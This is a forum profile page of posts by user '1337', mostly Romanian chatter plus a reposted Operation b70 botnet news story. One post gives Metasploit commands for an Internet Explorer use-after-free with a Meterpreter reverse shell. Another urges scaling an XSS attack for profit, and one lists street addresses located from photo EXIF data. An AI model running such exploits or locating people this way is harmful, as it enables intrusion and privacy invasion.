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Everything posted by 1337

  1. Sau incerci sa le capeti prin metode blackhat care deja sunt fumate de mult timp, care nu includ carding si alte magarii.
  2. Microsoft stumbled upon a series of malware samples, during an action codenamed “Operation b70” initiated by the company to investigate claims that malware was installed within counterfeited software on computers in China even before systems reached shelves. The US District Court of Virginia granted Microsoft legitimate control over the domain 3322.org that hosted, among others, the infamous Nitol botnet which proved key to this investigation, helping Microsoft “disrupt more than 500 different strains of malware with the potential for targeting millions of innocent people,” according to the company. Microsoft digital crime investigators found the malware when they brought in 20 PCs, 10 desktops and 10 laptops from across China. Four of the brand new computers were infected with malware. Deeper analysis revealed how the malicious code had been installed in counterfeited software on the systems. “In Operation b70, we discovered that retailers were selling computers loaded with counterfeit versions of Windows software embedded with harmful malware. Malware allows criminals to steal a person’s personal information to access and abuse their online services, including e-mail, social networking accounts and online bank accounts.” says the report. Microsoft details how criminals managed to piggyback on an unsecure supply chain to install viruses on PCs while they were built. “A supply chain between a manufacturer and a consumer becomes unsecure when a distributor or reseller receives or sells products from unknown or unauthorized sources.” The moment the systems infected with Nitol were turned on, they tried to connect to some C&C centers to fetch commands from bot-masters. The botnet was run from a web domain associated to cybercrime since 2008. The domain had 70,000 sub-domains used by 500 different malware samples used in separate attacks. The Chinese owner of the 3322.org domain says his company had “zero tolerance” towards such practices and opposes the use “of any of our domain names for malicious purposes.” Source : HOTforSecurity
  3. Timeline : Vulnerability found exploited in the wild and discovered by Eric Romang First details of the vulnerability the 2012-09-14 Advanced details of the vulnerability provided by binjo the 2012-09-16 Metasploit PoC provided the 2012-09-17 PoC provided by : unknown eromang binjo sinn3r juan vazquez Reference(s) : OSVDB-85532 Vulnhunt.com eromang blog Metasploit Affected version(s) : IE 7 on Windows XP SP3 IE 8 on Windows XP SP3 IE 7 on Windows Vista IE 8 on Windows Vista IE 8 on Windows 7 IE 9 on Windows 7 Tested on Windows XP Pro SP3 with : Internet Explorer 8 Description : This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it. Commands : use exploit/windows/browser/ie_execcommand_uaf set SRVHOST set PAYLOAD windows/meterpreter/reverse_tcp set LHOST exploit sysinfo getuid Sursa : eromang blog
  4. Cu XSS-ul in sectiunea XXX, strici bunatate de "vulnerabilitate" pentru niste conturi amarate, cand cum ai spus si tu poti sa dezvolti atacul la o scara mult mai mare si in acelasi timp profitabila. Bani cu care poti sa investeti in alt XSS cand se "strica" actualul. Nu stiu de ce sume dispui dar cred ca Nemessis face niste bani destul de frumosi cu metodele noi, nu cred ca le-ar sharui cu tine .
  5. 1337

    Your desktop

    Tex, postezi si tu, chiar m-ai facut curios, dar de la datacenter ce drq
  6. jetus ce zona ?
  7. Prea complex. Nu ti-l face nici un indian puturos fara 1000 de ron... uita-te de doua ori la ce au scris baietii de mai sus, poate iti deschizi ochii.
  8. Raton, i-am propus 30 de dolari pe LR si nu a vrut.
  9. Anvata sa scri pxasxll, nu ma jicni p mne k ven cu baieti si te bat, am 7 ani ai strazi dute an colo!! Nu merita sa vorbesti cu el, sincer, e agramat, premiul nobel i se cuvine!
  10. Tot la tine,
  11. Sti engleza (mediu) , ai microfon?
  12. The Onion, o panarama de post ) ei au bagat si stirea aia fake despre Justin Biebahh
  13. 1 Londra, Harrow , Holmwood Close 2. Steelhead Dr., Kelseyville CA MANUAL - EXIF + GOOGLE MAPS
  14. Imi pare rau imi retrag cuvintele totusi cred ca sufera si de logoree si de schizofrenie, consider ca informatia nu este gresita si ca are legatura cu afectiunea ce o sufera persoana ce apare in videoclipul postat.
  15. Epic fail eh?Schizofrenicul alatureaza fara sens neologisme si alte cuvinte ce nu au legatura cu o anumita tema, ti-as da si niste docs dar nu am timp momentan, uita-te la cum e imbracata si ce freza are... http://ro.wikipedia.org/wiki/Schizofrenie#Manifest.C4.83rile_clinice punctul patru, smart-asses.
  16. Vi se pare amuzant? Mie nu femeia sufera de schizofrenie ...
  17. http://s16.postimage.org/76u40a1kz/Untitled.png daca da licienta automat, repara buba asta!!! Felicitari pentru program!
  18. Da-mi mai multe detalii pe PM
  19. Paste Fericit.
  20. iPhone 4, 16GB, magazin computergames
  21. 1337


    off: Da, aproape spre diaree, cred ca era acuta si infectioasa. /pofta buna on: e misto
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